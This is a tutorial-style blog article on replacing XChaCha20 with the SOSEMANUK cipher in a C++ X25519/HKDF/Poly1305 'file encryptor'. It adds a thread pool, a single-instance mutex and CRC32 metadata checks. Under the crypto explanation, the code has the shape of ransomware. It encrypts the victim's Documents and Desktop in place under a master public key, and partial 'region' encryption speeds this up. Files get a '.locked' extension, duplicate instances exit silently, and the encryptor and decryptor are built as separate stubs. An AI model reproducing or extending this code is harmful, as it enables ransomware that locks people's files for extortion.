Article: SOSEMANUK: A Viable Alternative to ChaCha20?

Remio · 03.01.2026

An X25519 + SOSEMANUK-Poly1305 Test + Cleaning Up the File Encryptor:

GitHub Links to Projects:

Improved X25519+ChaCha20-Poly1305 with New Features: https://github.com/notRemyQ/X25519-ChaCha20-POLY1205-File-Encryptor
SOSEMANUK Proof-of-Concept Encryptor: https://github.com/notRemyQ/SOSEMANUK-Proof-of-Concept

To quickly recap: in the first article we walked through an X25519–HKDF–XChaCha20–Poly1305 file encryption scheme and examined how the encryptor and decryptor exchange ephemeral keys, derive per-file symmetric keys, and authenticate everything. That design worked well. In this article we’re going to do a few things: implement a thread pool and a mutex, clean up the codebase, properly implement the CRC32 checksum, and then see what happens when we swap a new cipher into the same framework. We’ll keep the same key agreement, the same HKDF, and the same MAC, and evaluate whether SOSEMANUK is a practical alternative to XChaCha20 for our file-encryption system.

Before we can understand the cipher in question we need to take a look at two other ciphers:

SNOW 2.0: a stream cipher built around a linear-feedback shift register (LFSR) for state evolution and a finite-state machine (FSM) for nonlinear mixing, giving it strong theoretical grounding and high throughput.
SERPENT: an AES‑finalist block cipher known for its conservative design and highly analyzed S‑boxes, which provide strong nonlinear confusion.

SOSEMANUK essentially merges SNOW’s LFSR‑FSM structure with SERPENT’s S‑boxes to create a fast and software‑optimized stream cipher. It improves on SNOW with faster initialization and better overall performance, supports 128–256‑bit keys (with 128‑bit security), and uses a 128‑bit IV. It works by:

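Running the SERPENT key schedule over the key to produce a set of subkeys
Encrypting the IV with a reduced, 24-round SERPENT and using intermediate round outputs to initialize the LFSR and FSM
Clocking the LFSR and FSM together to produce intermediate 32-bit words
Passing those words, four at a time, through a SERPENT-derived S-box and XORing the result with LFSR output to generate the keystream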

The reference implementation produces keystream in 80-byte (640-bit) chunks, achieving speeds of around 4–7 cycles/byte on modern x86 processors, which makes it comparable to ChaCha20 (and, I find, sometimes even faster). It's a bit more complex, however, and lacks the simplicity and built-in AEAD pairing we saw in the previous tutorial that helped ChaCha20-Poly1305 become a standard. To compare the two we can tabulate their main features:

SOSEMANUK vs ChaCha20/XChaCha20

Feature	XChaCha20	SOSEMANUK
Design Basis:	Very simple ARX (Add-Rotate-XOR)	LFSR + FSM + SERPENT S-boxes
Key Size:	256 bits	128–256 bits
IV/Nonce Size:	192 bits (24 bytes)	128 bits (16 bytes)
Performance:	Roughly 4 cycles/byte	Around 4–7 cycles/byte
Security Analysis:	Extensive (Salsa20 family)	Extensive (eSTREAM finalist)
Best Use Case:	TLS, VPNs, embedded systems, wide range	High-throughput bulk encryption, niche projects

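Both come from the eSTREAM lineage (SOSEMANUK is in the final software portfolio, and ChaCha20 is a variant of the portfolio cipher Salsa20), and neither has known practical attacks. SOSEMANUK excels in high-throughput software encryption, while ChaCha20 is slightly better for constrained devices.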

Can We Use SOSEMANUK for Our File Encryption System?

SOSEMANUK has over fifteen years of public analysis with no practical breaks, delivers excellent throughput on large sequential data, and exposes a clean “key + IV > keystream” interface that fits streaming workloads well. It also integrates smoothly with our X25519 > HKDF > Poly1305 design: HKDF can supply a fresh symmetric key, we can derive a 128-bit IV per file or chunk, and Poly1305 handles authentication without conflicting with the cipher’s structure or assumptions. That makes SOSEMANUK a seemingly viable option for our file-encryption system, especially since the eSTREAM submissions were written against a common API, which makes them easy to interchange. All software-profile ciphers share a common structure:

C:

// Generic Stream Cipher API
typedef struct cipher_context {
    // Internal state (implementation-specific)
} cipher_context;

// Initialize with key
void cipher_keysetup(cipher_context* ctx, const uint8_t* key, size_t key_len);

// Set IV/nonce
void cipher_ivsetup(cipher_context* ctx, const uint8_t* iv, size_t iv_len);

// Generate keystream and XOR with data
void cipher_encrypt_bytes(cipher_context* ctx,
                          const uint8_t* plaintext,
                          uint8_t* ciphertext,
                          size_t length);

This standardized interface means you can swap ciphers with minimal code changes regardless of which cipher you use because the core cryptographic construction remains identical (in theory). The cipher just becomes a swappable component in our encryption system.

However, much like the other eSTREAM ciphers, we don’t need the actual eSTREAM wrapper files to use SOSEMANUK. The software-portfolio ciphers (Salsa20, with ChaCha20 as a later variant, HC-128, Rabbit, and SOSEMANUK) ship with their own APIs that mirror the eSTREAM structure but are designed to be used inline without the full ECRYPT framework. The standardized “key > IV > keystream” model is conceptual; the implementations themselves are self-contained and can be embedded directly into our system without pulling in any external eSTREAM headers. For a stream cipher to work in our X25519-HKDF-Poly1305 construction, it needs only:

Synchronous stream operation: It produces a keystream that is XORed with the plaintext.
Deterministic keystream: The same (key, IV) pair always produces the same keystream. This is critical for decryption.
Clean nonce/IV handling: The IV must be either random (if it's large enough to avoid collisions) or a counter (if guaranteed unique per key).
No built in authentication: The cipher just encrypts. Authentication still comes from Poly1305 or some other authentication mechanism.
Arbitrary length plaintext: Can encrypt any number of bytes without padding schemes.
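The first two requirements are easy to see in a toy sketch. The `ToyStream` class and `toy_crypt` helper below are hypothetical stand-ins written for this illustration; they are not SOSEMANUK and not secure. They expand a (key, IV) pair with the SplitMix64 mixer purely to show that a synchronous stream cipher is deterministic, needs no padding, and that applying the same keystream twice returns the plaintext.

```cpp
#include <cstdint>
#include <cstddef>
#include <vector>

// Hypothetical toy keystream generator (NOT secure, NOT SOSEMANUK).
// It only demonstrates "same (key, IV) -> same keystream".
class ToyStream {
public:
    ToyStream(uint64_t key, uint64_t iv)
        : state_(key ^ (iv * 0x9E3779B97F4A7C15ULL)) {}

    // XOR the keystream into `data` in place; any length, no padding.
    void apply(std::vector<uint8_t>& data) {
        for (size_t i = 0; i < data.size(); ++i) {
            if (avail_ == 0) { block_ = next64(); avail_ = 8; }
            data[i] ^= static_cast<uint8_t>(block_);
            block_ >>= 8;
            --avail_;
        }
    }

private:
    // One SplitMix64 step: advance the state and mix it into 64 output bits.
    uint64_t next64() {
        uint64_t z = (state_ += 0x9E3779B97F4A7C15ULL);
        z = (z ^ (z >> 30)) * 0xBF58476D1CE4E5B9ULL;
        z = (z ^ (z >> 27)) * 0x94D049BB133111EBULL;
        return z ^ (z >> 31);
    }

    uint64_t state_;
    uint64_t block_ = 0;
    int avail_ = 0;
};

// Encryption and decryption are the same call with a fresh context.
std::vector<uint8_t> toy_crypt(uint64_t key, uint64_t iv, std::vector<uint8_t> data) {
    ToyStream s(key, iv);
    s.apply(data);
    return data;
}
```

Calling `toy_crypt` on the ciphertext with the same key and IV gives back the original bytes, while changing only the IV produces a different ciphertext. A real cipher such as SOSEMANUK follows the same calling pattern.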

All eSTREAM finalists meet these requirements, which is why they slot neatly into Encrypt-then-MAC constructions. That suits us, because our file encryptor has clearly separated concerns:

C:

// Layer 1: the key Agreement (X25519)
curve25519_donna(shared_secret, ephemeral_private, master_public);

// Layer 2: Derive the keys (HKDF-SHA512)
HKDF_SHA512(salt, shared_secret, info, okm, 64);
memcpy(cipher_key, okm, 32);      // For stream cipher
memcpy(auth_key, okm + 32, 32);  // For Poly1305

// Layer 3: Encryption (swappable!)
cipher_keysetup(&ctx, cipher_key, 32);
cipher_ivsetup(&ctx, iv, iv_len);
cipher_encrypt_bytes(&ctx, plaintext, ciphertext, length);

// Layer 4: Authentication (Poly1305)
poly1305_init(&mac_ctx, auth_key);
poly1305_update(&mac_ctx, ciphertext, length);
poly1305_finish(&mac_ctx, tag);

Because each layer is independent, X25519 still provides forward secrecy, HKDF still produces uniform key material, and Poly1305 still authenticates the ciphertext. The only component that changes is the Layer-3 stream cipher. This modularity lets us swap XChaCha20 for SOSEMANUK or any other eSTREAM cipher without touching key agreement, key derivation, or authentication. This ability to switch easily between cryptographic primitives is known as algorithm agility. None of the eSTREAM portfolio ciphers has a known practical attack, so the decision really comes down to performance and engineering fit. One caveat: SOSEMANUK's designers claim 128-bit security even with a 256-bit key, whereas XChaCha20 targets the full 256 bits. Both are far beyond any practical attack, and SOSEMANUK delivers excellent throughput for bulk file encryption.

Even though swapping XChaCha20 for SOSEMANUK requires minimal changes, as with all tasks in life there is still some work involved and therefore a few things to consider:

The nonce size: 24 bytes (XChaCha20) to 16 bytes (SOSEMANUK)
We're moving from a single context to two contexts (key + run)
We obviously need to swap the function names: xchacha_* to sosemanuk_*
We need to update the metadata

So let's walk through these modifications step by step. Firstly, the metadata structure shrinks by 8 bytes due to the smaller IV. Note that this smaller IV is perfectly safe, as 16 bytes (128 bits) provides 2^128 possible values, far beyond what's needed for random nonce generation. Even encrypting a billion files per second for a century wouldn't exhaust this space. By the birthday bound, random 128-bit IVs only become likely to collide after roughly 2^64 of them, which is more than common estimates of the number of grains of sand on Earth. And because every file also gets its own HKDF-derived key, a repeated IV across files would not reuse a keystream anyway.
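For a rough sense of scale, the standard birthday approximation gives the probability that any two of n uniformly random 128-bit IVs coincide. This is a back-of-the-envelope estimate that assumes the IVs are uniformly random and all used under one key, which is more pessimistic than our per-file-key design:

```latex
p(n) \;\approx\; 1 - e^{-n(n-1)/2^{129}} \;\approx\; \frac{n^{2}}{2^{129}},
\qquad
p\!\left(2^{32}\right) \;\approx\; \frac{2^{64}}{2^{129}} = 2^{-65}
```

So even four billion IVs under a single key give a collision probability of about 2^-65. The estimate only approaches even odds around n = 2^64.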

C++:

// Our previous 89 byte XChaCha20 implementation:
#pragma pack(push, 1)
struct FileMetadata {
    uint32_t version;   // 4 bytes
    uint8_t ephemeral_public[32];  // 32 bytes
    uint8_t nonce[24];  // 24 bytes (XChaCha20)
    uint8_t encryption_mode;  // 1 byte
    uint64_t original_size;    // 8 bytes
    uint8_t poly1305_tag[16];  // 16 bytes
    uint32_t metadata_checksum; //4 bytes
};
#pragma pack(pop)

// to 81 bytes:
#pragma pack(push, 1)
struct FileMetadata {
    uint32_t version;     // 4 bytes
    uint8_t ephemeral_public[32]; // 32 bytes
    uint8_t iv[16];      // 16 bytes (SOSEMANUK)
    uint8_t encryption_mode; // 1 byte
    uint64_t original_size; // 8 bytes
    uint8_t poly1305_tag[16];  // 16 bytes
    uint32_t metadata_checksum; // 4 bytes
};
#pragma pack(pop)

const uint32_t CRYPTO_VERSION = 0x00030001; // v3.1 (SOSEMANUK) // ... I suppose we should update the version also
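Since the decryptor locates the metadata by `sizeof(FileMetadata)`, it can be worth pinning the sizes at compile time. The sketch below is one way to do that. The struct names `FileMetadataXChaCha` and `FileMetadataSosemanuk` are hypothetical, used only so both layouts can sit side by side in one translation unit.

```cpp
#include <cstdint>
#include <cstddef>

#pragma pack(push, 1)
struct FileMetadataXChaCha {           // hypothetical name for the old layout
    uint32_t version;                  // 4 bytes
    uint8_t  ephemeral_public[32];     // 32 bytes
    uint8_t  nonce[24];                // 24 bytes (XChaCha20)
    uint8_t  encryption_mode;          // 1 byte
    uint64_t original_size;            // 8 bytes
    uint8_t  poly1305_tag[16];         // 16 bytes
    uint32_t metadata_checksum;        // 4 bytes
};

struct FileMetadataSosemanuk {         // hypothetical name for the new layout
    uint32_t version;                  // 4 bytes
    uint8_t  ephemeral_public[32];     // 32 bytes
    uint8_t  iv[16];                   // 16 bytes (SOSEMANUK)
    uint8_t  encryption_mode;          // 1 byte
    uint64_t original_size;            // 8 bytes
    uint8_t  poly1305_tag[16];         // 16 bytes
    uint32_t metadata_checksum;        // 4 bytes
};
#pragma pack(pop)

// Fail the build if packing or a field change alters the on-disk layout.
static_assert(sizeof(FileMetadataXChaCha) == 89, "old metadata must be 89 bytes");
static_assert(sizeof(FileMetadataSosemanuk) == 81, "new metadata must be 81 bytes");
static_assert(offsetof(FileMetadataSosemanuk, metadata_checksum) == 77,
              "checksum must be the last 4 bytes of the structure");
```

The last assertion matters for the checksum code later on, which covers `sizeof(FileMetadata) - sizeof(uint32_t)` bytes and so relies on the checksum being the final field.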

Encryption / Decryption Function Changes
The only real change here is that the core encryption logic shifts from XChaCha20’s single-context model to SOSEMANUK’s two-context model. XChaCha20 uses one unified state for key, nonce, counter, and block generation. SOSEMANUK splits this in two: a key context, which holds the SERPENT-derived subkeys and is computed once per key, and a run context, which holds the LFSR and FSM state initialized from the key context and the IV. Setup is therefore two calls instead of one, but the external flow remains the same (key > IV > keystream), so integration is no more complex. Separating the key schedule from the per-IV state also means a key context can be reused when several IVs are run under one key.

C++:

//  Initialize the context
// XChaCha20: single context
XChaCha_ctx ctx;
xchacha_keysetup(&ctx, key, nonce);

// SOSEMANUK's two contexts (key + run)
sosemanuk_key_context key_ctx;
sosemanuk_run_context run_ctx;
sosemanuk_schedule(&key_ctx, key, 32);       // Setup key schedule
sosemanuk_init(&run_ctx, &key_ctx, iv, 16);  // Initialize with IV

// Encrypt each region
for (int i = 0; i < regionCount; i++) {

    // XChaCha20
    xchacha_encrypt_bytes(&ctx, Buffer, Buffer, chunkSize);
    // SOSEMANUK
    sosemanuk_encrypt(&run_ctx, Buffer, Buffer, chunkSize);
}

// XChaCha20 clean up
SecureZeroMemory(&ctx, sizeof(ctx));
// SOSEMANUK cleanup
SecureZeroMemory(&key_ctx, sizeof(key_ctx));
SecureZeroMemory(&run_ctx, sizeof(run_ctx));

You can see the workflow remains the same. The only differences are the cipher-specific setup, keystream generation, and context cleanup. It should highlight how eSTREAM-style stream ciphers like SOSEMANUK can be swapped into an existing system with minimal changes, letting us maintain the same key management, file structure, and authentication layers while choosing the cipher that we find works best.

Decryption simply mirrors these encryption changes:

C++:

bool decryptFile(const wchar_t* filepath) {
    HANDLE hFile = CreateFileW(filepath, GENERIC_READ | GENERIC_WRITE, 0, NULL,
                              OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        return false;
    }
 
    // The way we read and validate metadata from end of file (unchanged)
    LARGE_INTEGER fileSizeLI;
    GetFileSizeEx(hFile, &fileSizeLI);
    LONGLONG totalSize = fileSizeLI.QuadPart;
 
    FileMetadata meta;
    LARGE_INTEGER metaOffset;
    metaOffset.QuadPart = totalSize - sizeof(FileMetadata);
    SetFilePointerEx(hFile, metaOffset, NULL, FILE_BEGIN);
 
    DWORD bytesRead;
    ReadFile(hFile, &meta, sizeof(meta), &bytesRead, NULL);
 
    // Validate
    if (!ValidateMetadata(&meta, totalSize)) {
        CloseHandle(hFile);
        return false;
    }
 
    // X25519 key agreement remains unchanged (uint8_t shared_secret...)
 
    // Derive keys (unchanged except version string)
    uint8_t sosemanuk_key[32];
    uint8_t poly_key[32];
    uint8_t okm[64];
 
    HKDF_SHA512((const uint8_t*)"filecrypto-v3.1", 15,
                shared_secret, 32,
                (const uint8_t*)"key-derivation", 14,
                okm, 64);
 
    memcpy(sosemanuk_key, okm, 32);
    memcpy(poly_key, okm + 32, 32);
    SecureZeroMemory(okm, 64);
 
    // Verify the Poly1305 MAC BEFORE decryption (unchanged); the region calculation below is also unchanged
    if (!VerifyPoly1305MAC(hFile, meta.original_size, poly_key, meta.poly1305_tag)) {
        CloseHandle(hFile);
        SecureZeroMemory(shared_secret, 32);
        SecureZeroMemory(sosemanuk_key, 32);
        SecureZeroMemory(poly_key, 32);
        return false;
    }
 
    EncryptionRegion regions[10];
    int regionCount = 0;
    CalculateRegions(meta.original_size, (EncryptionMode)meta.encryption_mode,
                    regions, &regionCount);
 
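    LPBYTE buffer = (LPBYTE)malloc(BufferSize);
    // Skip decryption if the allocation failed; free(NULL) in the error path is harmless
    BOOL success = (buffer != NULL) &&
                   DecryptFileRegions(hFile, buffer, sosemanuk_key, meta.iv,
                                      regions, regionCount);  // Decrypt SOSEMANUK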
 
    if (!success) {
        free(buffer);
        CloseHandle(hFile);
        SecureZeroMemory(shared_secret, 32);
        SecureZeroMemory(sosemanuk_key, 32);
        SecureZeroMemory(poly_key, 32);
        return false;
    }
 
    // Truncate file to original size (unchanged)
    LARGE_INTEGER newSize;
    newSize.QuadPart = meta.original_size;
    SetFilePointerEx(hFile, newSize, NULL, FILE_BEGIN);
    SetEndOfFile(hFile);
    CloseHandle(hFile);
 
    // Remove .locked extension (unchanged)
    wchar_t finalPath[MAX_PATH];
    wcscpy_s(finalPath, MAX_PATH, filepath);
    size_t len = wcslen(finalPath);
    if (len > 7 && _wcsicmp(finalPath + len - 7, L".locked") == 0) {
        finalPath[len - 7] = L'\0';
        MoveFileExW(filepath, finalPath, MOVEFILE_REPLACE_EXISTING);
    }
 
    SecureZeroMemory(shared_secret, 32);
    SecureZeroMemory(sosemanuk_key, 32);
    SecureZeroMemory(poly_key, 32);
    free(buffer);
 
    return true;
}

The DecryptFileRegions function is nearly identical to its encryption counterpart, because SOSEMANUK uses the same function for both operations:

C++:

BOOL DecryptFileRegions(HANDLE hFile, LPBYTE Buffer,
                        uint8_t* key, uint8_t* iv,
                        EncryptionRegion* regions, int regionCount) {
 
    sosemanuk_key_context key_ctx;
    sosemanuk_run_context run_ctx;
    sosemanuk_schedule(&key_ctx, key, 32);
    sosemanuk_init(&run_ctx, &key_ctx, iv, 16);
 
    for (int i = 0; i < regionCount; i++) {
        if (!DecryptRegion(hFile, Buffer, &run_ctx,
                          regions[i].start, regions[i].size)) {
            SecureZeroMemory(&key_ctx, sizeof(key_ctx));
            SecureZeroMemory(&run_ctx, sizeof(run_ctx));
            return FALSE;
        }
    }
 
    SecureZeroMemory(&key_ctx, sizeof(key_ctx));
    SecureZeroMemory(&run_ctx, sizeof(run_ctx));
    return TRUE;
}

BOOL DecryptRegion(HANDLE hFile, LPBYTE Buffer, sosemanuk_run_context* run_ctx,
                  LONGLONG startPos, LONGLONG regionSize) {
    if (regionSize <= 0) return FALSE;
 
    LARGE_INTEGER offset;
    offset.QuadPart = startPos;
    SetFilePointerEx(hFile, offset, NULL, FILE_BEGIN);
 
    LONGLONG totalProcessed = 0;
    while (totalProcessed < regionSize) {
        DWORD chunkSize = (regionSize - totalProcessed > BufferSize) ?
                          BufferSize : (DWORD)(regionSize - totalProcessed);
 
        ReadFullData(hFile, Buffer, chunkSize);
 
        // Same function as encryption
        sosemanuk_encrypt(run_ctx, Buffer, Buffer, chunkSize);
 
        offset.QuadPart = startPos + totalProcessed;
        SetFilePointerEx(hFile, offset, NULL, FILE_BEGIN);
        WriteFullData(hFile, Buffer, chunkSize);
 
        totalProcessed += chunkSize;
    }
 
    return TRUE;
}

Adding a Thread Pool
As we can see, swapping the cipher is quite straightforward. To get an idea of its true speed we introduce a thread pool, which allows multiple files to be processed in parallel and significantly increases total throughput. This parallelism becomes especially valuable when processing large numbers of files.

C++:

// ThreadPool.h: header-only thread pool for file processing
class ThreadPool {
private:
    struct WorkItem {
        wchar_t filepath[MAX_PATH];
        WorkItem* next;
    };
 
    HANDLE* threads;
    DWORD threadCount;
    CRITICAL_SECTION queueLock;
    HANDLE workAvailable;
    HANDLE shutdownEvent;
    WorkItem* queueHead;
    WorkItem* queueTail;
    bool shuttingDown;
    void* context;  // For passing HCRYPTPROV or other data
 
    static DWORD WINAPI WorkerThread(LPVOID param) {
        ThreadPool* pool = (ThreadPool*)param;
        return pool->WorkerThreadProc();
    }
 
    DWORD WorkerThreadProc() {
        while (true) {
            HANDLE events[2] = { workAvailable, shutdownEvent };
            DWORD result = WaitForMultipleObjects(2, events, FALSE, INFINITE);
 
            if (result == WAIT_OBJECT_0 + 1) {
                break;  // Shutdown event
            }
 
            WorkItem* item = NULL;
 
            EnterCriticalSection(&queueLock);
            if (queueHead != NULL) {
                item = queueHead;
                queueHead = item->next;
                if (queueHead == NULL) {
                    queueTail = NULL;
                }
            }
            LeaveCriticalSection(&queueLock);
 
            if (item != NULL) {
                ProcessFile(item->filepath);  // Virtual function
                delete item;
            }
        }
        return 0;
    }
 
protected:
    // Override this in the derived classes
    virtual void ProcessFile(const wchar_t* filepath) = 0;
 
public:
    ThreadPool(DWORD numThreads, void* ctx = NULL)
        : context(ctx), shuttingDown(false) {
 
        // Autodetect thread count if not specified
        threadCount = numThreads;
        if (threadCount == 0) {
            SYSTEM_INFO sysInfo;
            GetSystemInfo(&sysInfo);
            threadCount = sysInfo.dwNumberOfProcessors * 2;
        }
 
        InitializeCriticalSection(&queueLock);
        workAvailable = CreateEvent(NULL, FALSE, FALSE, NULL);
        shutdownEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
        queueHead = NULL;
        queueTail = NULL;
 
        // Create worker threads
        threads = new HANDLE[threadCount];
        for (DWORD i = 0; i < threadCount; i++) {
            threads[i] = CreateThread(NULL, 0, WorkerThread, this, 0, NULL);
        }
    }
 
    virtual ~ThreadPool() {
        Shutdown();
        DeleteCriticalSection(&queueLock);
        CloseHandle(workAvailable);
        CloseHandle(shutdownEvent);
        delete[] threads;
    }

    void AddWork(const wchar_t* filepath) {
        if (shuttingDown) return;
 
        WorkItem* item = new WorkItem;
        wcscpy_s(item->filepath, MAX_PATH, filepath);
        item->next = NULL;
 
        EnterCriticalSection(&queueLock);
        if (queueTail == NULL) {
            queueHead = queueTail = item;
        } else {
            queueTail->next = item;
            queueTail = item;
        }
        LeaveCriticalSection(&queueLock);
        SetEvent(workAvailable);
    }
 
    void Shutdown() {
        if (shuttingDown) return;
        shuttingDown = true;
 
        SetEvent(shutdownEvent);
        WaitForMultipleObjects(threadCount, threads, TRUE, INFINITE);
 
        for (DWORD i = 0; i < threadCount; i++) {
            CloseHandle(threads[i]);
        }
        // Clean up
        EnterCriticalSection(&queueLock);
        while (queueHead != NULL) {
            WorkItem* item = queueHead;
            queueHead = item->next;
            delete item;
        }
        queueTail = NULL;
        LeaveCriticalSection(&queueLock);
    }
    void* GetContext() { return context; }
};

We can then create a specialized thread pool instance inside each stub to handle encryption and decryption separately. Remember that each stub is a separate program, so each one just includes ThreadPool.h and runs its own pool independently.

C++:

// thread pool for the encryptor
class EncryptionThreadPool : public ThreadPool {
protected:
    void ProcessFile(const wchar_t* filepath) override {
        HCRYPTPROV hProv = (HCRYPTPROV)GetContext();
        encryptFile(filepath, hProv);
    }
 
public:
    EncryptionThreadPool(DWORD numThreads, HCRYPTPROV hProv)
        : ThreadPool(numThreads, (void*)hProv) {
    }
};

// thread pool for the decryptor
class DecryptionThreadPool : public ThreadPool {
protected:
    void ProcessFile(const wchar_t* filepath) override {
        decryptFile(filepath);
    }
 
public:
    DecryptionThreadPool(DWORD numThreads)
        : ThreadPool(numThreads, NULL) {
    }
};

We can access it in the main program by:

C++:

int WINAPI wWinMain(...) {
    HCRYPTPROV hProv;
    CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT);
 
    // Create thread pool (0 = auto-detect thread count)
    EncryptionThreadPool* pool = new EncryptionThreadPool(0, hProv);
 
    // Recursively scan directories and add files to queue
    ProcessDirectoryThreaded(L"C:\\Users\\User\\Documents", pool);
    ProcessDirectoryThreaded(L"C:\\Users\\User\\Desktop", pool);
 
    // Wait for all work to complete
    delete pool;  // Destructor calls Shutdown() and waits
 
    CryptReleaseContext(hProv, 0);
    return 0;
}

When passed 0, the thread pool sizes itself to twice the number of logical processors, which dramatically improves performance on systems with many files.

Adding a Mutex
Great, we have our super fast encryptor... So fast, in fact, that accidentally running the encryptor multiple times without realising it, or running two instances simultaneously, would be catastrophic: files could become unrecoverable. We prevent this with a named mutex:

C++:

// Unique mutex name (change for each build)
#define MUTEX_NAME L"Global\\{E7A3F9C2-4B1D-4E8F-9A2C-6D5E8F1B3C4A}"

int WINAPI wWinMain(etc...) {
 
    HANDLE hMutex = CreateMutexW(NULL, TRUE, MUTEX_NAME);
 
    if (GetLastError() == ERROR_ALREADY_EXISTS) {
        // Another instance is already running - exit silently
        if (hMutex) CloseHandle(hMutex);
        return 0;
    }
 
    // do encryption...
 
    // Release mutex before exit
    if (hMutex) {
        ReleaseMutex(hMutex);
        CloseHandle(hMutex);
    }
 
    return 0;
}

It works by having the first instance create a mutex and continue running, while any subsequent instance that tries to create the same mutex receives ERROR_ALREADY_EXISTS and immediately exits, ensuring only one instance runs until the mutex is released. We use the "Global\\" prefix to ensure it's system-wide across all user sessions.

A fresh GUID for each build's mutex name can be generated with:

PowerShell:

[guid]::NewGuid()

Implementing a Proper CRC32
The metadata structure already includes a checksum field, meant to detect corruption of the metadata before we attempt decryption. Until now that field was filled by a placeholder shift-XOR loop rather than a real CRC32:

C++:

// Original placeholder
uint32_t crc = 0;
for (size_t i = 0; i < sizeof(FileMetadata) - sizeof(uint32_t); i++) {
    crc = (crc << 8) ^ ((uint8_t*)&meta)[i];
}
meta.metadata_checksum = crc;

This is pretty useless for detecting corruption: each byte is XORed into the low 8 bits and shifted out of the 32-bit value four iterations later, so the result depends only on the last four bytes covered. For production use, we need a proper CRC32 implementation. Here we just use Stephan Brumme's optimized CRC32 library. It's a classic implementation that uses the standard zlib polynomial (0xEDB88320) and employs Slicing-by-16 lookup tables for excellent performance (achieving around 1-2 cycles per byte on modern CPUs). It's well-tested, widely used, and provides multiple algorithm variants, from simple bitwise calculation to highly optimized table-based approaches. We use crc32_fast(), which maps to the fastest variant compiled into the library:

C++:

// Proper CRC32 implementation
#include "Crc32.h"

// Calculate checksum over metadata (excluding checksum field itself)
meta.metadata_checksum = crc32_fast(&meta, sizeof(FileMetadata) - sizeof(uint32_t), 0);

// Validation during decryption is again straightforward
BOOL ValidateMetadata(const FileMetadata* meta, LONGLONG encryptedFileSize) {
    // Do other validation checks ...
 
    // Verify CRC32 checksum
    uint32_t calculated_crc = crc32_fast(meta, sizeof(FileMetadata) - sizeof(uint32_t), 0);
    if (calculated_crc != meta->metadata_checksum) return FALSE;
 
    return TRUE;
}
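To see what the library computes underneath the lookup tables, here is a minimal bitwise CRC-32 using the same reflected zlib polynomial. It is a sketch for understanding and testing, not a replacement for the optimized library. The name `crc32_bitwise_ref` is our own, chosen so it doesn't clash with anything in Crc32.h.

```cpp
#include <cstdint>
#include <cstddef>

// Bitwise CRC-32 with the reflected polynomial 0xEDB88320 (zlib/PNG/Ethernet).
// `previous` lets a checksum be continued across several buffers.
uint32_t crc32_bitwise_ref(const void* data, size_t length, uint32_t previous = 0) {
    uint32_t crc = ~previous;                       // undo the final inversion
    const uint8_t* p = static_cast<const uint8_t*>(data);
    while (length--) {
        crc ^= *p++;                                // fold the next byte in
        for (int bit = 0; bit < 8; ++bit) {
            // Shift right by one; XOR in the polynomial if the bit shifted out was 1.
            crc = (crc >> 1) ^ (0xEDB88320u & (0u - (crc & 1u)));
        }
    }
    return ~crc;                                    // standard final inversion
}
```

A handy sanity check is the standard CRC-32 check value: the nine ASCII bytes "123456789" must hash to 0xCBF43926. Any table-driven variant should agree with this function on every input.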

The CRC32 checksum covers all metadata fields: version number, ephemeral public key, IV/nonce, encryption mode, original file size, and Poly1305 tag. This lets us detect accidental modification of these critical fields before performing expensive cryptographic operations. Poly1305 provides cryptographic authentication of the file contents (detecting malicious tampering), while the CRC32 serves as a fast preliminary integrity check on the metadata structure (detecting accidental corruption), allowing us to fail early on corrupted metadata without unnecessary decryption attempts. To emphasise: CRC32 is not a cryptographic primitive and cannot prevent malicious tampering. It's designed to detect random corruption from disk errors, transmission issues, or storage failures. Together, CRC32 catches honest errors, while Poly1305 catches tampering.

A common misconception is that Poly1305 is somehow tied to ChaCha20 because of "ChaCha20-Poly1305" AEAD. In reality, Poly1305 is completely algorithm-agnostic.

Our new system uses the same Encrypt-then-MAC construction described in detail in the XChaCha20 article. To recap, we derive two independent keys from HKDF, then use one for SOSEMANUK encryption and the other for Poly1305 authentication:

C++:

// 1: Derive TWO independent keys from HKDF
uint8_t okm[64];
HKDF_SHA512(salt, shared_secret, info, okm, 64);

uint8_t cipher_key[32];  // first 32 bytes  > SOSEMANUK
uint8_t mac_key[32]; // second 32 bytes > Poly1305

memcpy(cipher_key, okm, 32);
memcpy(mac_key, okm + 32, 32);

// 2: Encrypt using SOSEMANUK
sosemanuk_key_context key_ctx;
sosemanuk_run_context run_ctx;

sosemanuk_schedule(&key_ctx, cipher_key, 32);
sosemanuk_init(&run_ctx, &key_ctx, iv, 16);
sosemanuk_encrypt(&run_ctx, plaintext, ciphertext, length);

// 3: Compute Poly1305 MAC over ciphertext
poly1305_context mac_ctx;

poly1305_init(&mac_ctx, mac_key);
poly1305_update(&mac_ctx, ciphertext, length);
poly1305_finish(&mac_ctx, tag);   // Produces 16-byte tag

// 4: Store tag in metadata
memcpy(meta.poly1305_tag, tag, 16);
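On the decryption side, the recomputed tag has to be compared against the stored one. How VerifyPoly1305MAC does this isn't shown here, so the following is only a sketch of one common approach: a comparison that never exits early, so its running time doesn't reveal how many leading bytes matched. The helper name `tags_equal` is hypothetical. In practice a vetted library routine is preferable, since compilers are free to optimize hand-written loops.

```cpp
#include <cstdint>
#include <cstddef>

// Compare two 16-byte Poly1305 tags without an early exit.
// Returns true only if every byte matches.
bool tags_equal(const uint8_t a[16], const uint8_t b[16]) {
    uint8_t diff = 0;
    for (size_t i = 0; i < 16; ++i) {
        diff |= static_cast<uint8_t>(a[i] ^ b[i]);  // accumulate any mismatch
    }
    return diff == 0;
}
```

This is the check that should gate decryption in an Encrypt-then-MAC design: if it fails, the ciphertext is rejected before a single byte is decrypted.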

Now that we have the keys derived and the primitives in place, we have a solid foundation for exploring eSTREAM ciphers without compromising security, because our encryptor cleanly separates concerns:

Code:

// Layer 1: Key agreement
shared_secret = X25519(ephemeral_private, master_public)

// Layer 2: Derive keys (ensures key independence)
(cipher_key, mac_key) = HKDF(shared_secret)

// Layer 3: Encryption
ciphertext = SOSEMANUK(cipher_key, iv, plaintext)

// Layer 4: Authentication
tag = Poly1305(mac_key, ciphertext)

Only Layer 3 changes when swapping ciphers. Layers 1, 2, and 4 remain identical, so the overall construction keeps the same security guarantees as long as the replacement cipher behaves as a secure pseudorandom generator, has no known practical attacks, and uses proper key and IV sizes. SOSEMANUK meets all these requirements, and the resulting system provides:

High throughput
Parallel file processing
Single-instance protection (mutex)
Dynamic encryption
Robust validation across multiple layers (CRC, MAC, metadata checks)
A modular codebase

